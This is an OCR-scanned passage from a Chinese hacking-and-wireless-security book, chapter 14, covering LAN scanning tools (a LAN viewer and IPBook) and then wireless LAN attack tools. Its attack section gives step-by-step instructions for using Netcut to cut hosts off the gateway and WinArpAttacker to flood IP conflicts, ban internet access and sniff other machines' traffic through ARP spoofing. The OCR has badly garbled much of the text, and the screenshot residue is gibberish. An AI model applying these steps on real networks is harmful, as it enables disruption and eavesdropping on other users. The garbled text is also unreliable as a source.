Eee 加 双击 下 载 的 “局 域 网 查看 工具 ” 程 
序 ， 即 可 打开 “局 域 网 查看 工具 ” 主 窗 
口 ， 如 下 图 所 示 。 
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第 14 章 ”无线 局 域 网 的 安全 防护 Se 


x 

3 
es 
ee 
jee 
a 
ee 
3 
文 作弄 CE 县 | 菜 
文件 大 小品 型 以 上 

CI CE 


[step 园 选择 “局 域 网 聊天 ”选项 ， 在 其 中 可 以 设 
置 聊天 时 使 用 的 用 户 名 和 备注 ， 如 下 图 所 示 。 


RT Er 加 


三 


0 | 


[step 图 在 工具 栏 单 击 “ 工 具 选 项 ”按钮 ， 
即 可 打开 “选项 ”对 话 框 ， 选 择 “ 搜 索 计 
算 机 ”选项 ， 在 其 中 设置 扫描 计算 机 的 
起 始 IP 段 和 结束 IP 地 址 段 等 属性 ， 如 下 图 
所 示 。 


SN : DESKTOP-6TNQaF 


远大 x 
| 轴 扫 索 计算 机 
搜索 共享 文件 ?地址 端口 
局 区 9 陡 天 192. 169, 1 139 
扫 稼 六 口 192. 168.1.8 445, . 1024 
王 地 址 端口 
#4 (ns) |2000 添加 肝 条 清 宇 
| 


step 图 选择 “搜索 共享 文件 ”选项 ， 在 
其 中 即 可 添加 和 删除 文件 类 型 ， 如 下 图 
所 示 。 


有 x 


扫 过 计 其 机 
搜索 共享 文件 
扫 指 滑 D 


用 户 各 SOP-GTGT 长度 于 le 个 字 区 
庆生 [Laseo 朋 户 | 长度 小 于 5 个 字 节 
说 明 ， 以 上 设置 各 要 重新 启动 程序 才能 生效 

口 换 有 (消息 83 声音 提醒 


[mm | 


选择 “扫描 端口 ” 选项 ， 在 其 中 即 可 
设置 扫描 的 JP 地址 、 端 口 、 超 时 等 属性 ， 设 
置 完 毕 后 单 击 “保存 ”按钮 ， 即 可 保存 各 
项 设置 ， 如 下 图 所 示 。 


远大 x 
扫 索 计 其 机 
扫 索 共享 文件 下 地 址 端口 
总 局 了 天 192. 168.1 139 
扫 扩 | 192.168.1.8 445. ,1024 


[Step 图 在 “局 域 网 查看 工具 ” 主 窗 口中 单 击 
“开始 ”按钮 ， 即 可 搜索 出 指定 IP 段 内 的 主 
机 ， 在 其 中 即 可 看 到 各 个 主机 的 IP 地 址 、 计 
算 机 名 、 工 作 组 、MAC 地 址 等 属性 ， 如 下 
图 所 示 。 
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EA 


请 由 -和 和 娄 =0 


Estee 鞠 如 果 想 与 某 个 主机 建立 连接 ， 在 搜 
索 到 的 主机 列表 中 右 击 该 主机 ， 在 弹出 的 
快捷 菜单 中 选择 “打开 计算 机 ”选项 ， 即 
可 打开 “Windows 安 全 ”对 话 框 ， 在 其 中 
输入 该 主机 的 用 户 名 和 密码 后 ， 单 击 “ 确 
定 ” 按 钮 才 可 以 与 该 按钮 建立 连接 ， 如 下 
图 所 示 。 

Windows 安全 x 


输入 网 络 凭据 
边 入 你 的 凭据 以 连接 到 ;192.158.0.107 


cn 


域 : DESKTOP-67NQBIF 
口 记 住 各 的 作 据 
@ 月 六 二 或 这 码 不 正确. 


EE 6TNQBIF 


Ce Cw 


[step 较 在 “搜索 工具 ”栏目 下 单 击 “ 主 机 巡 
测 ” 按 钮 ， 即 可 打开 “主机 巡 测 ”窗口 ， 
此 时 可 搜索 出 在 线 的 主机 ， 在 其 中 即 可 看 
到 在 线 主 机 的 JP 地址 、MAC 地 址 、 最 近 扫 


[step 图 在 “局 域 网 查看 工具 ”中 还 可 以 对 
共享 资源 进行 设置 。 在 “搜索 工具 ”栏目 
下 单 击 “ 设 置 共享 资源 ”按钮 ， 即 可 打开 
“设置 共享 资源 ” 窗口， 如 下 图 所 示 。 
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step 罗 单 击 “ 共 享 目录 ”文本 框 后 的 浏览 按 
钮 ， 即 可 打开 “浏览 文件 夹 ” 对 话 框 ， 如 
下 图 所 示 。 


浏览 文件 突 x 


请 运 尝 文件 突 


Y 二 软件 (D;) 由 
360Downloads 
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[step 图 在 其 中 选择 需要 设置 为 共享 文件 的 文 
件 夹 后 ， 单 击 “确定 ”按钮 ， 即 可 在 “ 设 
置 共 享 资源 ”窗口 中 看 到 添加 的 共享 文件 
夹 ， 如 下 图 所 示 。 
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[step 图 在 “局 域 网 查看 工具 ”窗口 中 还 可 
以 进行 文件 复制 操作 ， 单 击 “搜索 工具 ? 
栏目 下 的 “搜索 计算 机 ”按钮 ， 即 可 打开 
“搜索 计算 机 ”窗口 ， 在 其 中 即 可 看 到 前 
面 添 加 的 共享 文件 夹 ， 如 下 图 所 示 。 
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[Step 图 在 “网 络 信息 ”栏目 下 可 以 查看 无 
线 局 域 网 中 各 个 主机 的 网 络 信息 。 例 如 单 
击 “ 活 动 端口 ”按钮 后 ， 在 打开 的 “活动 
端口 ” 窗口 中 单 击 “ 刷 新 ”按钮 ， 即 可 
看 到 所 有 主机 中 正在 活动 的 端口 ， 如 下 图 
所 示 。 


SsIan 


TT TE 


[step 了 图 在 “共享 文件 ”列表 中 右 击 需要 复制 
的 文件 ， 在 弹出 的 快捷 菜单 中 选择 “复制 
文件 ”菜单 命令 ， 即 可 打开 “建立 新 的 复 
制 任务 ”对 话 框 ， 如 下 图 所 示 。 
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[step 图 设置 存储 目录 并 选中 “立即 开始 ” 复 
选 框 后 ， 单 击 “ 确 定 ” 按 钮 即 可 开始 复制 
选 定 的 文件 。 此 时 单 击 “管理 工具 ”栏目 
下 的 “复制 文件 ”按钮 ， 即 可 打开 “复制 
文件 ”窗口 ， 在 其 中 即 可 看 到 刚才 复制 的 
文件 ， 如 下 图 所 示 。 


ED 


[Step 图 如 果 想 了 解 计算 机 的 网 络 适配器 信 
息 ， 则 需 单 击 “适配器 信息 ”按钮 ， 即 可 
在 打开 的 “适配器 信息 ”窗口 中 看 到 网 络 
适配器 的 详细 信息 ， 如 下 图 所 示 。 


XRTRLanseo yl1726 汪 到 - oO 
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[se 加 利用 “局 域 网 查看 工具 ”还 可 以 对 
远程 主机 进行 远程 关机 和 重启 操作 。 单 击 
“管理 工具 ”栏目 下 的 “远程 关机 ” 按 
钮 ， 即 可 打开 “远程 关机 ”窗口 ， 并 单 击 
“导入 计算 机 ”按钮 ， 即 可 导入 整个 局 域 
网 中 所 有 的 主机 ， 选 中 主机 前 面 的 复 选 杠 
后 ， 单 击 “ 远 程 关 机 ”按钮 和 “远程 重 
启 ” 按 钮 即 可 分 别 完成 关闭 和 重启 远程 计 
算 机 的 操作 ， 如 下 图 所 示 。 
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[Step 图 利用 “局 域 网 查看 工具 ”还 可 以 给 指定 
的 主机 发 送 消息 。 单 击 “ 管 理工 具 ” 栏 目下 的 
“发 送 消息 ”按钮 ， 即 可 打开 “发 送 消息 ” 窗 
口 ， 并 单 击 “ 导 入 计算 机 ”按钮 ， 即 可 导入 整 
个 无 线 局 域 网 中 所 有 的 主机 ， 如 下 图 所 示 。 
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选择 要 发 送 消息 的 主机 后 ， 在 “发 送 


消息 ”文本 区 域 中 输入 要 发 送 的 消息 ， 然 
后 单 击 “ 发 送 ”按钮 ， 即 可 将 这 条 消息 发 
送 给 指定 的 用 户 ， 此 时 即 可 看 到 该 主机 的 
发 送 状 态 是 正在 发 送 ， 如 下 图 所 示 。 
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Bes 轩 选择 “聊天 工具 ”栏目 ， 在 其 中 既 
可 与 无 线 局 域 网 中 用 户 进行 聊天 ， 还 可 以 


280 


共享 无 线 局 域 网 中 的 文件 。 如 果 想 和 无 线 
局 域 网 中 用 户 聊天 ， 则 需 单 击 “局 域 网 


聊天 ”按钮 ， 即 可 打开 “局 域 网 聊天 ” 窗 
口 ， 如 下 图 所 示 。 


Er) HER 疾 计 


(stp 在 下 图 的 “发 送信 息 ” 区 域 中 编辑 
要 发 送 的 消息 后 ， 单 击 “ 发 送 ” 按 钮 ， 即 
可 将 该 消息 发 送出 去 ， 此 时 在 “局 域 网 聊 
天 ”窗口 中 即 可 看 到 发 送 的 消息 ， 该 模式 
re 如 下 图 所 示 。 


eT ns YI7264 芭 | - oO 


FI 天 二老 际 ，DESKTCP.67NQBIF 


0 ES 


[step 图 单 击 “ 文 件 共享 ”按钮 ， 即 可 打开 “ 文 
件 共享 ”窗口 ， 在 黄 中 即 可 搜索 用 户 共享 、 复 
制 文件 、 添 加 共享 等 操作 ， 如 下 图 所 示 。 


RE 天。 太吉! DSKTOP .67NGBIF 


二 ERESTRIarEea 6 
ae 
让 CE 
2 
ETE 
Sa Er A 


3 


et) nt 了 


半 


14.2.2 ”使 用 IPBook 工 具 


IPBook 〈 超 级 网 络 邻 居 ) 是 一 款 小 巧 
的 搜索 共享 资源 及 FTP 共 享 的 工具 ， 软 件 自 
解压 后 就 能 直接 运行 。 它 还 有 许多 辅助 功 
能 ， 如 发 送 短信 等 ， 并 且 所 有 功能 不 限于 
无 线 局 域 网 ， 可 以 在 互联 网 使 用 ， 使 用 该 
工具 的 具体 操作 步骤 如 下 : 
[step 国 双 去 下 载 的 IPBook 应 用 程序 ， 打 开 
“IPBook (超级 网 络 邻 居 ) ” 主 窗口 ， 在 
其 中 即 可 自动 显示 本 机 的 IP 地 址 和 计算 机 
名 ， 其 中 192.168.0.104 和 192.168.0 分 别 是 本 
机 的 人 P 地 址 与 本 机 所 处 的 无 线 局 域 网 的 IP 范 
围 ， 如 下 图 所 示 。 


后 aock EEE [ER -oO x 
IR 9 四 
BE. rr | we | 


可 pcjm A ET 
2 oN io 


HEME 
| TR TI ET 
EC 


HesE 


Cr 
rz 


NBSTAT Rospone From 152168 人 104 RH 工 RNACE 


[sep 图 在 IPBook 工 具 中 可 以 查看 本 网 段 所 有 
的 计算 机 名 与 共享 资源 。 在 “IPBook (起 
级 网 络 邻 居 ) ” 主 窗口 中 ， 单 击 “ 扫 描 一 
个 网 段 ” 按 钮 ， 几 秒 钟 之 后 ， 本 机 所 在 的 
无 线 局 域 网 所 有 在 线 计算 机 的 详细 信息 将 
显示 在 左 侧 列表 框 中 ， 如 下 图 所 示 。 其 中 
包含 IP 地 址 、 计 算 机 名 、 工 作 组 、 信 使 等 
信息 。 


| ee | 
J 条 轩 192.153.0 人 失措 一 


ER | 牛皮 并 资源 | 从 大 范 轩 拉 鱼 | 怠 运 从 生发 | 


瑟 好 址 本 “] Pinc | mrera | 。 共 广 | 加 发 短 食 | 其 他 工具 | 
Ee ET 

HE aE 

[et 


TS TEL 
TO 


arratne，PapfatatebrdamroupFoanry 


EE 
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[step 图 在 显示 出 所 有 计算 机 信息 后 ， 单 击 
“点 验 共享 资源 ”按钮 ， 即 可 查 出 本 网 段 
机 器 的 共享 资源 ， 并 将 搜索 的 结果 显示 在 
右 侧 的 树 状 显 示 框 中 ， 如 下 图 所 示 ， 在 搜 
索 之 前 还 可 以 设置 是 否 同时 搜索 HTTP、 
FTP、 隐 藏 共享 服务 等 。 


PTE 3 
sm Im mm 
pas | anees| 

I TE As te 人 A Se 

"地 址 | my 加 发 得 信 | 其 

和 后 25 -ET 


HE 
[ems 


区 ] 
全 关机 工作 有 
-本 公司 


COR TSE 


= TT 

[step 加 在 IPBook 工 具 中 还 可 以 给 目标 网 
段 发 送 短 信 ， 在 “IPBook (超级 网 络 邻 
居 ) ” 主 窗口 中 单 击 “ 短 信和 群发 ”按钮 ， 
即 可 打开 “短信 群发” 对话 框 ， 如 下 图 
所 示 。 

二 发 Xx 

目标 网 段 : [EGG 


厂 群发 短信 给 已 经 搜索 到 的 的 计算 机 


Eh 和 江水， 连绵 不 绝 。 
全 天 人 十 执 款 了 中? 喷 完 了 灌 子 不 要 乱 扔 ， 乱 扔 要 大 到 小 朋 


即 德 玫 不 到 朋友 ， 砸 到 牙 鱼 也 不 好 啊 * 
kind reguard 


FREE 矿 自动 使 用 收 信者 的 信介 


您 的 仰 昔 者 


收 信人: 
发 送 人 : 


入 


厂 自动 使 用 发 信者 的 信介 


帮助 


[step 图 在 “计算 机 区 ”列表 中 选择 某 台 计 
算 机 ， 单 击 Ping 按 钮 ， 即 可 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗 口 看 到 该 命令 的 
运行 结果 ， 如 下 图 所 示 。 根 据 得 到 的 信息 
来 判断 目标 计算 机 的 操作 系统 类 型 。 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Poon EE aA = 
a TIRm RD 

EN 
| w 仑 围 [192. 163.0 

| zp [J 1] rre [thtaret [so 闻名 安生 | 到 地 I "| 
」 剂 D。[50:21.155 加 控 天 WD | 加 大 和 EMCH 术 | 

HE 


Em J E323 


€ ook ETEE aR = 
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a8 |ags |smes| 
I 2 139.1 ”从 提 闪 一 个 2 | 二 3 并 这 各 页 | 人 大池 到 本 | 芭 志 信 村 帮 | 
0 ire [ttsrar as 共 节 | 名 实生 | 天 地 I "| 
本 抬 REND | 四 大 村 本 染 CH 措 | 


el [12 158. 


TEE Cm 
和 


[ET 


[Et TREE TI 
er oor 


mmo DEsrToP oFIE WOREGTOUP 
0 RSROUP 
mom 。 snGEMantB3 。 YNCRESFOUP 
e1580114 AP0GTIET Wor 
ea010 
1 
EE ee 
EET 
Eso 
| 


[BR 
waPFERCUP 
OFFERCUP 
WORKSRCUP 
waREDRCUP 


工作 和 马 
Hep 


国 在 计算 机 区 列表 中 选择 某 台 计算 机 ， 
单 击 Nbtstat 按 钮 ， 即 可 在 “IPBook (超级 
网 络 邻 居 ) ” 主 窗口 看 到 该 主机 的 计算 机 
名 称 ， 如 下 图 所 示 。 


1 Penee EPE ANE 一生 
AW TR Wan) 

Hit | we | 

| wm [oz la Em EA 

| pb [19760 1H pire mbtaror [sw 拓 字 | 名 拓 全 节 I 后 | 

】 贡品。 55721 1 贡 ”加 迫 册 WD | 回 大 他国 MD 扫 术 


TT 


[Step 图 单 去 “探测 端口 ”按钮 ， 即 可 探测 整 
个 无 线 局 域 网 中 各 个 主机 的 端口 ， 同 时 将 
探测 的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 
所 示 。 

Pook 正和 = GaN) - oO x 
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EE rm EE 
Ti 直 ET Tinc| mototat|w 共 > | 双 光 ia 从 | 其 他 T 具 -| 


Hb 

[EL TH TEL ER CAN 
STR DESK TOP TOT WO PL ere 
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i Es 
cam UE 
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ac nagar ne Dean DS 

ed RAL eS oe 


NGSTAT Ron Fom 1 168010E 靖 关 有 人生 ， 工 人 MAC 二 每， 


[step 国 单 去 “共享 ”按钮 ， 即 可 对 指定 的 网 
络 段 的 主机 进行 扫描 ， 并 把 扫描 到 的 共享 
资源 显示 出 来 ， 如 下 图 所 示 。 


|i | eee | 
| wi [92 163.0 全 3 掉 一 个 隐 | 多 点 这 共 字 贞 天 “| 从 大 地 本 入 | 汉 乱 合计 安 | 


rah [195165 0- 1 >] rics | 地 tetat |aw 闪 划 | 回 当 后 信 | I 昌 ”| 
| 六 0 [W.15 “本 过 队 各 | 外 大 全 D3 入 

Hu He 

Eu Titamg TI [NE EL 加 
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sea0 04 DESKTOP EMORF ORGPOUP -车 和 工作 
e160 10 。 DE5FTDPSCYBNEI 。 WOREDTOUP 和 
a0 DESFTDP OFFIE NONSS0UP 
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Ho200H4 oe CMRGPOUP ER 
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Estee 图 IPBook 工 具 还 具有 将 域名 转换 为 IP 
地 址 的 功能 ， 在 “IPBook (超级 网 络 邻 
居 ) ” 主 窗 口中 单 击 “ 其 他 工具 ”按钮 ， 
在 弹出 的 快捷 菜单 中 选择 “域名 、 卫 地 址 转 
换 ” 一 “IP 一 Name” 菜 单项 ， 即 可 将 IP 地 
址 转换 为 域名 ， 如 下 图 所 示 。 
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问 口 [60:31 135” 回 梨 | 加 大 3 加 吕 扫 少 


#9 
I 和 区 < 
ETTETTIIT = 勒 ! 呈 Joion 
YoRFGROUP 个 公司 工作 各 
PECVBN 人 WORKGROUP i 
PONSE WPKGROUP m0 汪 交 
村 wonkGROUP 是 A 
FON S21 WORKGROUP Un 
0167TD21T21 。 WORKGROUP TT 
二 Sa 
rr 
全 下 折 
WORDROUP + | /oi 
[ W192.158.0.10 仓 全 革 忆 生生 开 . 


单 击 “大 范围 端口 扫描 ”按钮 ， 
即 可 打开 “扫描 端口 ”对 话 框 ， 如 下 
图 所 示 。 选 择 “IP 地 址 起 止 范围 ” 单 选 
框 后 ， 将 要 扫描 的 IP 地 址 范围 设置 为 
192.168.000.001~192.168.000.254， 最 后 将 
要 扫描 的 端口 设置 为 80:21。 
HG 
各 生生 ER 
和 下 下 下 东周 
附近 可 


从 : fmm 


到 : fm 


扫 才 计算 机 《1921600~) 了 
1 了 15801 到 1321580254 共 1 个 网 投 254 
台电 征 的 崇 吕 


到 先 Fna 后 连 
诺 呵 也 


Ci am | uw 


[sep 贺 单 去 “开始 ”按钮 ， 即 可 对 设 定 IP 地 
址 范围 内 的 主机 进行 扫描 ， 同 时 将 扫描 到 
的 主机 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 


PBook 下 z 汪 折 瑟 加 网 总) 


二 


[ E27 


在 使 用 IPBook 工 具 过 程 中 ， 还 可 以 
对 该 软件 的 属性 进行 设置 。 在 “IPBook 
(超级 网 络 邻 居 ) ” 主 窗口 中 选择 “ 工 
具 ” 一 “选项 ”菜单 项 ， 即 可 打开 “ 设 
置 ” 对 话 框 ， 如 下 图 所 示 。 在 “扫描 设 
置 ” 选 项 卡 下 ， 即 可 进行 “Ping 设 置 ” 和 
“设置 解析 计算 机 名 的 方式 ”属性 。 


谭 x 
[|#| 
Pingi8 置 
Tmeow [ai 
厂 采用 先 Png 后 
i 厂 所 搞 时 顺带 扫 索 共享 当 源 


个 正常 


他 rbtstat 


取消 孝 助 
step 图 选择 “共享 设置 ”选项 卡 ， 在 其 中 可 
设置 最 大 线程 数 、 搜 索 共 享 时 的 顺带 搜索 
项 目 等 属性 ， 如 下 图 所 示 。 


设置 XK 


| 


最 大 线程 数 x 

下 列 是 搜索 共享 时 的 顺带 搂 索 项 目 
厂 搜索 HTTP 服 务 
全 搜索 FTP 服 务 
厂 搜索 隐藏 共享 


取消 才 助 
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如 果 成 功 注册 后 ， 就 可 以 使 用 大 范围 
搜索 功能 来 搜索 任意 范围 的 计算 机 名 、 工 
作 组 、MAC 地 址 及 共享 资源 等 。 


14.3 “无线 局 域 网 的 攻击 


黑客 可 以 利用 专门 的 工具 来 攻击 整个 
无 线 局 域 网 ， 例 如 使 无 线 局 域 网 中 两 台 计 
算 机 的 耳 地 址 发 生 冲 突 ， 从 而 导致 其 中 的 一 
台 计算 机 无 法 上 网 。 本 节 将 介绍 几 款 常 见 
的 局 域 网 攻击 工具 的 使 用 方法 。 


14.3.1 网 络 剪 刀 手 Netcut 


网 络 前 切 手 Netcut 是 一 款 网 管 必 备 工 
具 ， 可 以 使 无 线 局 域 网 中 任何 主机 断 开 网 络 
连接 。 利 用 ARP 协 议 ， 同 时 也 可 以 看 到 无 线 
局 域 网 内 所 有 主机 的 耳 地 址 。 还 可 以 控制 本 
网 段 内 任意 主机 对 外 网 的 访问 ， 随 意 开启 或 
关闭 其 Internet 访 问 权 限 ， 而 访问 内 部 LAN 
其 他 机 器 不 存在 任何 问题 。 

该 工具 的 具体 使 用 步骤 如 下 


[sep 回 下 载 并 安装 网 络 剪 刀 手 Netcut， 然 后 
双击 其 快捷 图 标 ， 即 可 打开 Netcut 主 窗口 。 
软件 会 自动 搜索 当前 网 段 内 的 所 有 主机 的 
JP 地址、 计算 机 名 以 及 各 自 对 应 的 MAC 地 
址 ， 如 下 图 所 示 。 


[Eee 贺 单 去 “选择 网 卡 ” 按 钮 ， 打 开 “ 选 
择 网 卡 ” 对 话 框 ， 在 其 中 可 以 选择 搜索 计 
算 机 及 发 送 数 据 包 所 使 用 的 网 卡 ， 如 下 图 
所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


| Adapters 
Altansic L2 Fast Ethemet Controller [Microsoft's 


网 卡 信息 

网 卡 :Atansic L2 Fast Ethemet Controller [Microsoft's Packet 
Schedule 站 

物理 地 址 : [00:1E:8C:17.80:85] 

1P 地 址 : [i92 168.0.8] 

网 关 : [192168.0.1] 


Eee 图 在 网 络 剪 刀 手 中 还 可 以 开启 或 关闭 无 
线 局 域 网 内 任意 主机 对 网 关 的 访问 。 在 打 
描 出 的 主机 列表 中 选中 IP 地 址 为 192.168.0.8 
的 主机 后 ， 单 击 “ 切 断 ” 按 钮 ， 即 可 看 到 
该 主机 的 “ 开 / 关 ”状态 已 经 变 为 “ 关 ”， 
此 时 该 主机 不 能 访问 网 关 ， 也 不 能 打开 网 
页 ， 如 下 图 所 示 。 


再 次 选中 IP 地 址 为 192.168.0.8 的 主机 
后 ， 单 击 “ 恢 复 ” 按 钮 ， 即 可 看 到 该 主机 
的 “ 开 / 关 ”状态 又 重新 变 为 “ 开 ”， 此 时 
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[step 国 如 果 无 线 局 域 网 中 主机 太 多 ， 可 以 使 
用 该 工具 提供 的 查找 功能 ， 快 速 查看 某 个 主 
机 的 信息 。 在 Netcut 主 窗口 中 单 击 “查找 ” 按 
钮 ， 即 可 打开 “查找 ”对 话 框 ， 如 下 图 所 示 。 


[step 图 在 其 中 的 文本 框 中 输入 要 查找 主机 的 
菜 个 信息 ， 这 里 输入 的 是 IP 地 址 ， 然 后 单 击 
“查找 ”按钮 ， 即 可 在 Netcut 主 窗口 中 快速 
找到 IP 地 址 为 192.168.0.8 的 主机 信息 ， 如 下 
图 所 示 。 


[step 国 利用 网 络 剪 刀 手 的 打印 表 功 能 即 可 查 
看 无 线 局 域 网 中 所 有 主机 的 信息 。 在 Netcut 
主 窗 口中 单 击 “ 打 印 表 ” 按 钮 ， 即 可 打开 
“地 址 表 ” 对 话 框 ， 在 其 中 即 可 看 到 所 在 
无 线 局 域 网 中 所 有 主机 的 MAC 地 址 、IP 地 
址 、 用 户 名 等 信息 ， 如 下 图 所 示 。 


[step 图 在 网 络 剪 刀 手 工具 中 还 可 以 将 某 个 主 
机 的 IP 地 址 设置 成 网 关 IP 地 址 。 在 Netcut 主 
窗口 中 选择 某 台 主机 后 ， 单 击 国 可 按 馈 ， 

将 该 他 地 址 添加 到 “网 关 IP” 列 表 中 ， 如 下 


图 所 示 。 


14.3.2 WinArpAttacker 


WinArpAttacker 是 一 款 功能 强大 的 无 线 
局 域 网 软件 ， 利 用 该 工具 可 以 实现 对 ARP 机 
器 列表 扫描 ; 对 ARP 攻 击 、 主 机 状态 、 本 地 
ARP 表 发 生变 化 等 进行 检测 ， 检 测 其 他 机 
器 的 ARP 监 听 攻 击 ， 并 自动 恢复 正确 的 ARP 
表 ; 把 ARP 数 据 包 保 存 到 文件 ， 发 送 手 工 定 
制 ARP 包 等 。 但 是 该 工具 是 基于 Winpcap 软 
件 , 所 以 在 运行 前 必须 先 安装 Winpcap 软 件 。 

使 用 WinArpAttacker 工 具 的 具体 操作 步 
又 如 下 : 

下 载 WinArpAttacker 软 件 ， 双 击 其 中 
的 “WinArpAttackerexe” 程 序 ， 即 可 打开 


本 i 本 
WinArpAttacker” 主 窗口 ， 如 下 图 所 示 。 
[mms 

2 央 bl ga 山 

3 
a 层 具 王 - 锅 水 区 | 知 同 冉 洁 | 彤 
Pa [sses rowere [Oviw ong sse | wo a 
[Dereon oniE AD DRTor TN ovine Horal Nem pm 
汪 a 二 到 
a 
Ss E 
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[step 图 选择 “扫描 ”一 “高 级 ”菜单 项 ， 
即 可 打开 “扫描 ”对 话 框 ， 从 中 可 以 看 出 
有 “扫描 主机 ”“ 扫 描 网 段 ” “多 网 段 扫 
描 ” 等 3 种 扫描 方式 ， 如 下 图 所 示 。 


Em x 
高 如 要 简 
oi 机 [emo 
ia [本 0 [本 1 0 55 
多 网 上 后 六 
Sunet [Th [iets I 


Do 192168.0.104 255.255 255. 0 


厅 正常 扫 据 厂 反 监 听 扫 措 
扫描 取消 


[step 图 使 用 “扫描 主机 ”方式 可 以 获得 目 
标 主 机 的 MAC 地 址 。 在 “扫描 ”对 话 框 
中 选择 “扫描 主机 ” 单 选 按钮 ， 并 在 后 面 
的 文本 框 中 输入 目标 主机 的 IP 地 址 ， 例 如 
192.168.0.104， 然 后 单 击 “ 扫 描 ” 按 钮 ， 即 


可 获得 该 主机 的 MAC 地 址 ， 如 下 图 所 示 。 
ED x 
高 织 扫 描 
6 要 扩 主机 [16 0 100 OECD 
广 扫 据 耻 段 [0 .1 [到 6 0 .254 
个 多 网 各 扫描 


Subnet [TF Netmash 
Do 192.168.0.104 255. 255 255.0 


厅 下 党 厂 En 和 
扫 搞 | 取 消 
step 轩 “扫描 网 段 ”方式 可 以 对 指定 IP 段 范 


pp 选择 “扫描 网 段 ” 
单 选 按钮 后 ， 在 IP 地 址 范围 的 文本 框 中 输入 
扫描 的 IP 地 址 范围 ， 如 下 图 所 示 。 


E=: x 

高 级 扫 阐 
ci [m0 FE 
6 扫 指 取 段 192 .1686 .0 .1 192 .168 . 0 .254 
(人 网 各 和 并 

subnet [7h Wetnask 

Do i192168.0.104 255. 255, 255.0 

订 正常 扫 痢 厂 反 点 听 扫 指 

取消 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


step 图 单 击 “ 扫 描 ” 按 钮 即 可 进行 扫描 
操作 ， 当 扫描 完成 时 会 出 现 一 个 Scaning 
successfully! 对 话 框 ， 如 下 图 所 示 。 


WinArpAttacker x 


FY\ Scanning successfully ! 


E66 国 依次 单 去 “确定 ”按钮 ， 返 回 到 
WinArpAttacker 主 窗口 中 ， 在 其 中 即 可 看 到 
扫描 结果 。 此 时 WinArpAttacker 窗 口 被 分 成 
三 个 部 分 ， 如 下 图 所 示 。 


GGGGGGG 后 一 


3 
oneaeren tony 


Ready [TR Mar TE SE AD TT GN OZ TERT GW 


e 上 面 的 区 域 是 主机 列表 区 ， 主 要 显 
示 无 线 局 域 网 内 的 机 器 IP、MAC、 
主机 名 、 是 否 在 线 、 是 否 在 监听 、 
是 否 处 于 被 攻击 状态 ， 以 及 ARP 数 
据 包 和 转发 数据 包 统 计 信 息 等 ; 

e 左下 方 的 第 二 个 区 域 是 检测 事件 显 
示 区 ， 主 要 显示 检测 到 的 主机 状态 
变化 和 攻击 事件 ; 

e 右 下 方 的 区 域 显示 IP 地 址 和 MAC 地 
址 信息 。 

[step 园 在 扫描 结果 中 选中 要 攻击 的 目标 计算 
机 前 面 的 复 选 框 ， 然 后 在 WinArmpAttacker 主 窗 
口中 单 击 “ 攻 击 ” 下 拉 按 钮 ， 在 弹出 的 快 
捷 菜 单 中 选择 任意 选项 就 可 以 对 其 他 计算 
机 进行 攻击 了 ， 如 下 图 所 示 。 


286 


二 有 以 下 6 种 攻击 

方式 : 

e 不 断 IP 冲 突 : 不 间断 的 IP 冲 突 攻 
击 ，FLOOD 攻 击 默认 是 一 千 次 ， 可 
以 在 选项 中 改变 这 个 数值 。FLOOD 
攻击 可 使 对 方 机 器 弹出 IP 冲 突 对 话 
框 ， 导 致死 机 ; 

e 禁止 上 网 : 禁止 上 网 ， 可 使 对 方 机 
器 不 能 上 网 ; 

e 定时 IP 冲 突 ; 定时 的 IP 冲 突 ; 

e 监听 网 关 通 信 : 监听 选 定 机 器 与 网 
关 的 通信 ， 监 听 对 方 机 器 的 上 网 流 
量 。 发 动 攻击 后 用 抓 包 软件 来 抓 包 


看 内 容 ; 

e 监听 主机 通信 : 监听 选 定 的 几 台 机 
器 之 间 的 通信 ; 

e 监听 网 络 通 信 : 监听 整个 网 络 任意 
机 器 之 间 的 通信 ， 这 个 功能 过 于 危 
险 ， 可 能 会 把 整个 网 络 搞 乱 ， 建 议 
不 要 乱用 。 


EO 如 果 选 择 “IP 冲 突 ” 选 项 ， 即 可 使 目 
标 计算 机 不 断 弹出 “IP 地 址 与 网 络 上 的 其 他 
系统 有 冲突 ”提示 框 ， 如 下 图 所 示 。 


局 Tindors - 系统 错误 头 
IP 地 址 与 网 络 上 的 其 地 系统 有 冲突 。 


[sep 图 如 果 选 择 “禁止 上 网 ”选项 ， 此 时 在 
WinArpAttacker 主 窗口 就 可 以 看 到 该 主机 的 
“攻击 ”属性 就 变 为 BanGateway， 如 果 想 


停止 攻击 ， 则 需 在 WinArpAttacker 主 窗口 选 
择 “ 攻 击 ” 一 “停止 攻击 ”菜单 项 进行 停 
止 ， 否 则 将 会 一 直 进行 ， 如 下 图 所 示 。 


本 UNed WwWwphacar 370 ex 


EE 


| 虽 居 
Agdress [ons | Sing TAG | psa | tps | wpR- | pap 
| ER 1 


加 
5 a 9 
7 


o 
日 


在 WinArpAttacker 主 窗口 中 单 击 “ 发 
送 ”按钮 ， 即 可 打开 “手动 发 送 ARP 包 ?” 
对 话 框 ， 在 其 中 设置 目标 硬件 Mac、Arp 方 


向 、 源 硬件 Mac、 目 标 协议 Mac、 源 协议 
Mac、 目 标 IP 和 源 IP 等 属性 后 ， 单 击 “ 发 
送 ” 按 钮 ， 即 可 向 指定 的 主机 发 送 ARP 数 
据 包 ， 如 下 图 所 示 。 

手动 发 送 ARP 包 ， 对 


取 置 ?冲突 志 


Dst Hardvare Nac 


jb0-00-00-05-00- 生 二 时 2 和 Dy ar 
oo-00-00-00-00- 厂 
00-00-00-00-00C 三 pe [0 0 0 
00-00-00-00-00- 厂 sre 严 


Sre Hardvare Nao 


Dst Protoool Nac 


Sre Proteool Mao 


o 
-J 


ooo0000 00 00 00 00 00 00 00 00 00 00 00 00 08 06 00 01 
oooooolo og oo 0€ 04 00 01 00 00 00 00 00 00 00 00 00 00 
|oooooozo oo oo 00 00 00 00 00 00 00 00 


EB Sl db 


Frequency eonfigure Telay between packets 


C Continsously Dlwy 记 hs 
他 Nomber of tine 站 | 
厂 Disable Detect feature， 
取 消 | 


lstep 轩 在 WinArpAttacker 主 窗口 中 选择 

“设置 ”菜单 项 ， 然 后 在 弹出 的 快捷 菜 
单 中 选择 任意 一 项 即 可 打开 Options 对 话 
